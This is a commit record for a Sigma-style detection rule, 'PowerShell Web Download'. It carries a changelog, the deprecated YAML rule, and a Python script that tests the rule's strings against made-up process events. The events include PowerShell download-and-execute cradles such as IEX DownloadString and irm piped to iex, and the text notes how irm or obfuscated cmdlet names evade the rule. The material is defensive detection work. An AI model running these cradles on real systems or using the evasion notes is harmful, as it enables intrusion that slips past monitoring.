1e41c5378e
remove: PowerShell Web Download - deprecate duplicate rule in favour of 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d
update: PowerShell Script With File Upload Capabilities - add invoke-restmethod cmdlet
update: Change User Agents with WebRequest - add invoke-restmethod cmdlet
update: Usage Of Web Request Commands And Cmdlets - add invoke-restmethod cmdlet
update: Usage Of Web Request Commands And Cmdlets - ScriptBlock - add invoke-restmethod cmdlet
update: Potential DLL File Download Via PowerShell Invoke-WebRequest - add invoke-restmethod cmdlet
update: PowerShell Download and Execution Cradles - add invoke-restmethod cmdlet
update: Suspicious Invoke-WebRequest Execution With DirectIP - add invoke-restmethod cmdlet
update: Suspicious Invoke-WebRequest Execution - add powershell_ise
update: Potential Data Exfiltration Activity Via CommandLine Tools - add invoke-restmethod cmdlet
update: Obfuscated IP Download Activity - add invoke-restmethod cmdlet
update: Suspicious PowerShell In Registry Run Keys - add invoke-restmethod cmdlet

---------

Co-authored-by: phantinuss <79651203+phantinuss@users.noreply.github.com>
29 lines
837 B
YAML
title: PowerShell Web Download
id: 6e897651-f157-4d8f-aaeb-df8151488385
status: deprecated
description: Detects suspicious ways to download files or content using PowerShell
references:
    - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
author: Florian Roth (Nextron Systems)
date: 2022-03-24
modified: 2025-07-18
tags:
    - attack.command-and-control
    - attack.execution
    - attack.t1059.001
    - attack.t1105
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        CommandLine|contains:
            - '.DownloadString('
            - '.DownloadFile('
            - 'Invoke-WebRequest '
            - 'iwr '
    condition: selection
falsepositives:
    - Scripts or tools that download files
level: medium
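To see what the deprecated selection above actually catches, the following is an added example (it is not part of the Sigma repository or this commit): a small Python evaluator that applies the rule's four `CommandLine|contains` strings, with Sigma's default case-insensitive string matching, to a handful of constructed process-creation events. The events and the 203.0.113.0/24 addresses are made up for illustration. The run shows that `.DownloadString(`, `.DownloadFile(`, `Invoke-WebRequest` and the `iwr` alias are matched, while `Invoke-RestMethod` and its `irm` alias fall through this selection entirely, which is the cmdlet the remaining rules in this commit add coverage for.

```python
"""Apply the deprecated 'PowerShell Web Download' selection to constructed events.

Added example, not code from the Sigma project. Sigma string matching is
case-insensitive by default, so each substring is compared after lowercasing.
"""

# Selection strings copied verbatim from the rule's CommandLine|contains list.
SELECTION = ['.DownloadString(', '.DownloadFile(', 'Invoke-WebRequest ', 'iwr ']

# Constructed process_creation events (not real telemetry; 203.0.113.0/24 is a
# documentation range). Only the CommandLine field matters for this rule.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/a.ps1')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://203.0.113.10/t.exe','C:\\Users\\Public\\t.exe')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest -Uri http://203.0.113.10/p.ps1 -OutFile p.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c IWR http://203.0.113.10/p.ps1 -OutFile p.ps1"},
    # The two cradles below use Invoke-RestMethod / irm, which this selection does not list.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-RestMethod -Uri http://203.0.113.10/p.ps1 | IEX"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c irm http://203.0.113.10/p.ps1 | iex"},
    # Benign control event.
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-ChildItem C:\\Temp"},
]


def matches(event, selection=SELECTION):
    """Return True if any selection substring occurs in CommandLine (case-insensitive)."""
    cmd = event.get("CommandLine", "").lower()
    return any(s.lower() in cmd for s in selection)


def evaluate(events, selection=SELECTION):
    """Split events into (hits, misses) lists of CommandLine strings."""
    hits, misses = [], []
    for event in events:
        (hits if matches(event, selection) else misses).append(event["CommandLine"])
    return hits, misses


if __name__ == "__main__":
    hits, misses = evaluate(SAMPLE_EVENTS)
    print("Matched by the deprecated rule:")
    for line in hits:
        print("  [+]", line)
    print("Not matched (coverage gap for this selection):")
    for line in misses:
        print("  [-]", line)
```

The gap is structural rather than a bug: `contains` on `'iwr '` and `'Invoke-WebRequest '` only sees those literal substrings, so an attacker switching to `Invoke-RestMethod`, `irm`, or a quoted/obfuscated cmdlet name is invisible to it. That is the kind of shortfall that motivates consolidating into a single rule that enumerates the full cmdlet family, as the surviving rules in this commit do.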